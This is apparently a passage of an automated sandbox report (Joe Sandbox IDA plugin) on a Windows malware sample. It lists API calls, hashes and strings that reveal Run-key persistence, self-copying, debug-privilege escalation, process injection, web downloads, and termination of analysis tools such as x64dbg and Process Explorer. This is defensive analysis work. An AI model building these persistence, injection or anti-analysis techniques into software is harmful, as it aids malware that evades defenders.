                                                                                                                                                                                                    • Part of subcall function 00007FF7CDC438C4: SHGetFolderPathW.SHELL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7CDC43AA9), ref: 00007FF7CDC4390D
                                                                                                                                                                                                    • Part of subcall function 00007FF7CDC438C4: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7CDC43AA9), ref: 00007FF7CDC43922
                                                                                                                                                                                                    • Part of subcall function 00007FF7CDC438C4: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7CDC43AA9), ref: 00007FF7CDC43935
                                                                                                                                                                                                    • Part of subcall function 00007FF7CDC438C4: CreateDirectoryW.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7CDC43AA9), ref: 00007FF7CDC43945
                                                                                                                                                                                                    • Part of subcall function 00007FF7CDC438C4: SetFileAttributesW.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7CDC43AA9), ref: 00007FF7CDC43958
                                                                                                                                                                                                    • Part of subcall function 00007FF7CDC438C4: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7CDC43AA9), ref: 00007FF7CDC4396D
                                                                                                                                                                                                    • Part of subcall function 00007FF7CDC438C4: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7CDC43AA9), ref: 00007FF7CDC43980
                                                                                                                                                                                                    • Part of subcall function 00007FF7CDC438C4: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7CDC43AA9), ref: 00007FF7CDC43995
                                                                                                                                                                                                  • GetModuleFileNameW.KERNEL32 ref: 00007FF7CDC43AB9
                                                                                                                                                                                                  • DeleteFileW.KERNELBASE ref: 00007FF7CDC43AC4
                                                                                                                                                                                                  • CopyFileW.KERNELBASE ref: 00007FF7CDC43ADD
                                                                                                                                                                                                  • SetFileAttributesW.KERNELBASE ref: 00007FF7CDC43AF5
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.1325355643.00007FF7CDC41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7CDC40000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.1325269153.00007FF7CDC40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.1325462961.00007FF7CDC45000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.1325521531.00007FF7CDC47000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.1325600967.00007FF7CDC48000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.1325705613.00007FF7CDC4A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff7cdc40000_mggoBrtk9t.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Filelstrcat$AttributesDirectory$CopyCreateDeleteFolderInformationModuleNamePathVolumeWindowswsprintf
                                                                                                                                                                                                  • String ID: Services
                                                                                                                                                                                                  • API String ID: 3209240227-2319745855
                                                                                                                                                                                                  • Opcode ID: be0043b295d9898150489b8ba5340aa22ed2e55b609d377a08c94104789181f7
                                                                                                                                                                                                  • Instruction ID: 5c2cd969ea43fd3c70193af7df7b754ddf83a3e3981d64895a41d011012e81a4
                                                                                                                                                                                                  • Opcode Fuzzy Hash: be0043b295d9898150489b8ba5340aa22ed2e55b609d377a08c94104789181f7
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3D013C61B1C58296EB70AF24E4583BAA361FB94754FD05832D76D825A8FE2CD20ACB50

                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.1325355643.00007FF7CDC41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7CDC40000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.1325269153.00007FF7CDC40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.1325462961.00007FF7CDC45000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.1325521531.00007FF7CDC47000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.1325600967.00007FF7CDC48000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.1325705613.00007FF7CDC4A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff7cdc40000_mggoBrtk9t.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: DirectoryInformationVolumeWindowswsprintf
                                                                                                                                                                                                  • String ID: %08lX%04lX%lu
                                                                                                                                                                                                  • API String ID: 3001812590-640692576
                                                                                                                                                                                                  • Opcode ID: 740950ab7a4208dc5b437e8a53e5df2709b55f7c6f134fefe08efd8bb3628865
                                                                                                                                                                                                  • Instruction ID: 5037518df6c7b8a71472e85f0e706e642c84b1d6cccf7cb940fbafe46d0e88e5
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 740950ab7a4208dc5b437e8a53e5df2709b55f7c6f134fefe08efd8bb3628865
                                                                                                                                                                                                  • Instruction Fuzzy Hash: F731082661C5C18ADB30EF60E4983AAF3A1FB84710F901526E79D83A98EB3DC409CF10

                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.1325355643.00007FF7CDC41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7CDC40000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.1325269153.00007FF7CDC40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.1325462961.00007FF7CDC45000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.1325521531.00007FF7CDC47000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.1325600967.00007FF7CDC48000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.1325705613.00007FF7CDC4A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff7cdc40000_mggoBrtk9t.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: CloseOpenValue
                                                                                                                                                                                                  • String ID: Software\Microsoft\Windows\CurrentVersion\Run
                                                                                                                                                                                                  • API String ID: 779948276-1428018034
                                                                                                                                                                                                  • Opcode ID: 5fdf8a34efa352080ba6f6553334769d4c7d7706005dac43f85eff4b5ffc39d8
                                                                                                                                                                                                  • Instruction ID: 2db0d46a83fdebf6897ab8ded7e6fa69f982592b46fd32b83573377de2d8f08c
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5fdf8a34efa352080ba6f6553334769d4c7d7706005dac43f85eff4b5ffc39d8
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0811003561C6808AD760AF54E44466AB7A1E7847B0F505621EA7E43BE8EB6CD1458B10

                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                  control_flow_graph 423 7ff7cdc43b24-7ff7cdc43b33 424 7ff7cdc43b48-7ff7cdc43b4c 423->424 425 7ff7cdc43b35-7ff7cdc43b42 VirtualFree 423->425 425->424
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.1325355643.00007FF7CDC41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7CDC40000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.1325269153.00007FF7CDC40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.1325462961.00007FF7CDC45000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.1325521531.00007FF7CDC47000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.1325600967.00007FF7CDC48000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.1325705613.00007FF7CDC4A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff7cdc40000_mggoBrtk9t.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: FreeVirtual
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 1263568516-0
                                                                                                                                                                                                  • Opcode ID: c74ceee972ecbb736572674712f2cdca0c3e821b549de7bb17b5936316a1e88a
                                                                                                                                                                                                  • Instruction ID: 9a4a4211e43b96b9c9a9000886555e645fa7aff64fe2d4ee55cfc2e9219fd91d
                                                                                                                                                                                                  • Opcode Fuzzy Hash: c74ceee972ecbb736572674712f2cdca0c3e821b549de7bb17b5936316a1e88a
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 90D0C921F3894181E7A4AB26E889729A2A1FBC4B44F808035E699415A4DE3CC0AA8F00

                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                  control_flow_graph 426 7ff7cdc43b54-7ff7cdc43b7a VirtualAlloc
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.1325355643.00007FF7CDC41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7CDC40000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.1325269153.00007FF7CDC40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.1325462961.00007FF7CDC45000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.1325521531.00007FF7CDC47000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.1325600967.00007FF7CDC48000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.1325705613.00007FF7CDC4A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff7cdc40000_mggoBrtk9t.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: AllocVirtual
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 4275171209-0
                                                                                                                                                                                                  • Opcode ID: b541e8117daad4751c7a279db5381b441ce47fb4f749190da09f5cfabf446e69
                                                                                                                                                                                                  • Instruction ID: 9cb7a7332ed62ec7c1fa99d797c98d6ccceb5863e07b0cde023c9d6c85144bbe
                                                                                                                                                                                                  • Opcode Fuzzy Hash: b541e8117daad4751c7a279db5381b441ce47fb4f749190da09f5cfabf446e69
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1AC08CB1F2A180C7DB2CEF32E495F1B6A21B784740F908428EB0647B84C93EC2628F00
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  • Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.3, xrefs: 00007FF7CDC41D19
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.1325355643.00007FF7CDC41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7CDC40000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.1325269153.00007FF7CDC40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.1325462961.00007FF7CDC45000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.1325521531.00007FF7CDC47000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.1325600967.00007FF7CDC48000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.1325705613.00007FF7CDC4A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff7cdc40000_mggoBrtk9t.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Internet$CloseHandle$OpenSleep$HeapHttpInfoQuery$AllocateFileProcessRead
                                                                                                                                                                                                  • String ID: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.3
                                                                                                                                                                                                  • API String ID: 2307068205-2771526726
                                                                                                                                                                                                  • Opcode ID: 1d6439b4b7b4c33b889769c58a8dd001a4713a0aee7d85e729a6ddd97db8bc66
                                                                                                                                                                                                  • Instruction ID: c65967b95df306ead66592dcd2db9336f44a39e3229b641b19b95fc7829305f0
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1d6439b4b7b4c33b889769c58a8dd001a4713a0aee7d85e729a6ddd97db8bc66
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3671F736A1CA818AE760AF50F45833AB761FBC47A4F901035FB9E43AA8DF7CD4558B50
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.1325355643.00007FF7CDC41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7CDC40000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.1325269153.00007FF7CDC40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.1325462961.00007FF7CDC45000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.1325521531.00007FF7CDC47000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.1325600967.00007FF7CDC48000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.1325705613.00007FF7CDC4A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff7cdc40000_mggoBrtk9t.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Process$CloseHandleOpenToken$AdjustCurrentLookupObjectPrivilegePrivilegesSingleValueWait
                                                                                                                                                                                                  • String ID: SeDebugPrivilege
                                                                                                                                                                                                  • API String ID: 2379135442-2896544425
                                                                                                                                                                                                  • Opcode ID: 6555fb06984b99f5dc155d762adf927f354496d136c17024d6a4529462c8518f
                                                                                                                                                                                                  • Instruction ID: b97e0e8764268efe679850514ca9d5e28468bede80a4f2e090460c6997ee1581
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6555fb06984b99f5dc155d762adf927f354496d136c17024d6a4529462c8518f
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5541603261C6818AE770AF51F44876AF7B1FB80764FA04038EB9946A98DFBDD449CF50
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.1325355643.00007FF7CDC41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7CDC40000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.1325269153.00007FF7CDC40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.1325462961.00007FF7CDC45000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.1325521531.00007FF7CDC47000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.1325600967.00007FF7CDC48000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.1325705613.00007FF7CDC4A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff7cdc40000_mggoBrtk9t.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Virtual$AllocMemoryProcessProtectWrite
                                                                                                                                                                                                  • String ID: @
                                                                                                                                                                                                  • API String ID: 4073123320-2766056989
                                                                                                                                                                                                  • Opcode ID: f3439f0f28ca5504b0ff3065ed7b98b6ad7e1e81e5eec6f55742a1d8705483ff
                                                                                                                                                                                                  • Instruction ID: dd9e5f26d799355d0c1b472558caa71a09f5e8ef9825b528fcf5037c6da60e3d
                                                                                                                                                                                                  • Opcode Fuzzy Hash: f3439f0f28ca5504b0ff3065ed7b98b6ad7e1e81e5eec6f55742a1d8705483ff
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1441F23260CA858AE7709F15E45876BF7A1F784B98F504025EB8D83B98EF7DD4458B40
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.1325355643.00007FF7CDC41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7CDC40000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.1325269153.00007FF7CDC40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.1325462961.00007FF7CDC45000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.1325521531.00007FF7CDC47000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.1325600967.00007FF7CDC48000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.1325705613.00007FF7CDC4A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff7cdc40000_mggoBrtk9t.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: CloseCreateFirstHandleProcess32SnapshotToolhelp32wcscmp
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 2850635065-0
                                                                                                                                                                                                  • Opcode ID: 63e5253a01a862d048e65b759e2ae1b9c40c069b321cf87a3327907f1e8bf356
                                                                                                                                                                                                  • Instruction ID: 5dfa3419472092352abfe64236a64456acd08334b6872a4766d4461d05eb9f77
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 63e5253a01a862d048e65b759e2ae1b9c40c069b321cf87a3327907f1e8bf356
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9A110A71A0CA8289E770AF10E48C37AA3A1FB84764F904235C7AD426D8EF7DD515CB50
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.1325355643.00007FF7CDC41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7CDC40000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.1325269153.00007FF7CDC40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.1325462961.00007FF7CDC45000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.1325521531.00007FF7CDC47000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.1325600967.00007FF7CDC48000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.1325705613.00007FF7CDC4A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff7cdc40000_mggoBrtk9t.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Version
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 1889659487-0
                                                                                                                                                                                                  • Opcode ID: a034898b75751d47565587f8f48239afe675d10d53b418dd8b899e915f47bf55
                                                                                                                                                                                                  • Instruction ID: de648653c2f28d6bd3fc37191a9a7a529da03ab4b96c85b9d341661cb8c4b801
                                                                                                                                                                                                  • Opcode Fuzzy Hash: a034898b75751d47565587f8f48239afe675d10d53b418dd8b899e915f47bf55
                                                                                                                                                                                                  • Instruction Fuzzy Hash: BEF04431B4C1428AEB759E01E50C3F5B7E2AB99778FC01535D37C01594EA3DD5468E25
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.1325355643.00007FF7CDC41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7CDC40000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.1325269153.00007FF7CDC40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.1325462961.00007FF7CDC45000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.1325521531.00007FF7CDC47000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.1325600967.00007FF7CDC48000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.1325705613.00007FF7CDC4A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff7cdc40000_mggoBrtk9t.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: FileHeap$AllocateCloseCreateHandleProcessSize
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 2693768547-0
                                                                                                                                                                                                  • Opcode ID: 4e31ffde3c8b45f3337ce6ae119efcfc5e37158fb3e9376a1b8de9c2123a5d47
                                                                                                                                                                                                  • Instruction ID: a233c75069debec454ea18e9251f45dc9fe6aa2a3699d4f3311534030ea9215a
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4e31ffde3c8b45f3337ce6ae119efcfc5e37158fb3e9376a1b8de9c2123a5d47
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4C810A2260CB8186EA60DF55F44837AE7A1FBC8BA1F504135EB9D83B68EF7CD0558B10
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                    • Part of subcall function 00007FF7CDC445C4: CreateFileW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7CDC43117), ref: 00007FF7CDC4460C
                                                                                                                                                                                                    • Part of subcall function 00007FF7CDC445C4: SetFileAttributesW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7CDC43117), ref: 00007FF7CDC44649
                                                                                                                                                                                                    • Part of subcall function 00007FF7CDC445C4: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7CDC43117), ref: 00007FF7CDC44654
                                                                                                                                                                                                    • Part of subcall function 00007FF7CDC43B84: RegOpenKeyExW.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7CDC4311C), ref: 00007FF7CDC43BC7
                                                                                                                                                                                                    • Part of subcall function 00007FF7CDC43B84: RegSetValueExW.ADVAPI32 ref: 00007FF7CDC43BFD
                                                                                                                                                                                                    • Part of subcall function 00007FF7CDC43B84: RegCloseKey.ADVAPI32 ref: 00007FF7CDC43C0C
                                                                                                                                                                                                    • Part of subcall function 00007FF7CDC43C24: RegDeleteKeyW.ADVAPI32 ref: 00007FF7CDC43C3C
                                                                                                                                                                                                    • Part of subcall function 00007FF7CDC43E24: CreateToolhelp32Snapshot.KERNEL32 ref: 00007FF7CDC43E37
                                                                                                                                                                                                    • Part of subcall function 00007FF7CDC43E24: Process32FirstW.KERNEL32 ref: 00007FF7CDC43E6A
                                                                                                                                                                                                    • Part of subcall function 00007FF7CDC43E24: CloseHandle.KERNEL32 ref: 00007FF7CDC43E7C
                                                                                                                                                                                                    • Part of subcall function 00007FF7CDC43E24: wcscmp.MSVCRT ref: 00007FF7CDC43E91
                                                                                                                                                                                                    • Part of subcall function 00007FF7CDC43E24: OpenProcess.KERNEL32 ref: 00007FF7CDC43EA7
                                                                                                                                                                                                    • Part of subcall function 00007FF7CDC43E24: TerminateProcess.KERNEL32 ref: 00007FF7CDC43ECA
                                                                                                                                                                                                    • Part of subcall function 00007FF7CDC43E24: CloseHandle.KERNEL32 ref: 00007FF7CDC43ED8
                                                                                                                                                                                                    • Part of subcall function 00007FF7CDC43E24: Process32NextW.KERNEL32 ref: 00007FF7CDC43EEB
                                                                                                                                                                                                    • Part of subcall function 00007FF7CDC43E24: CloseHandle.KERNEL32 ref: 00007FF7CDC43EFD
                                                                                                                                                                                                    • Part of subcall function 00007FF7CDC439B4: RegOpenKeyExW.KERNELBASE(?,?,?,?,?,?,?,00007FF7CDC43B0C), ref: 00007FF7CDC439E4
                                                                                                                                                                                                  • Sleep.KERNEL32 ref: 00007FF7CDC431C6
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.1325355643.00007FF7CDC41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7CDC40000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.1325269153.00007FF7CDC40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.1325462961.00007FF7CDC45000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.1325521531.00007FF7CDC47000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.1325600967.00007FF7CDC48000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.1325705613.00007FF7CDC4A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff7cdc40000_mggoBrtk9t.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Close$Handle$Open$CreateFileProcessProcess32$AttributesDeleteFirstNextSleepSnapshotTerminateToolhelp32Valuewcscmp
                                                                                                                                                                                                  • String ID: ProcessHacker.exe$Services$TOTALCMD.exe$autoruns.exe$idaq.exe$idaq64.exe$procexp.exe$procexp64.exe$procmon.exe$x64dbg.exe
                                                                                                                                                                                                  • API String ID: 2853470409-928700279
                                                                                                                                                                                                  • Opcode ID: 214aab143e36c6a3a1886c25ccf32431eea88663dedd73175290a620f2c5ce1f
                                                                                                                                                                                                  • Instruction ID: 7b323e7dc25485ecc2f784586721cd7bfc7303f13248e342effef91415f42d76
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 214aab143e36c6a3a1886c25ccf32431eea88663dedd73175290a620f2c5ce1f
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8321AB20F9D54258EA24FF60D8591F5E262AF90770FD01931E73D421E6FE2CE91B8A64
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.1325355643.00007FF7CDC41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7CDC40000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.1325269153.00007FF7CDC40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.1325462961.00007FF7CDC45000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.1325521531.00007FF7CDC47000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.1325600967.00007FF7CDC48000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.1325705613.00007FF7CDC4A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff7cdc40000_mggoBrtk9t.jbxd
                                                                                                                                                                                                  Similarity
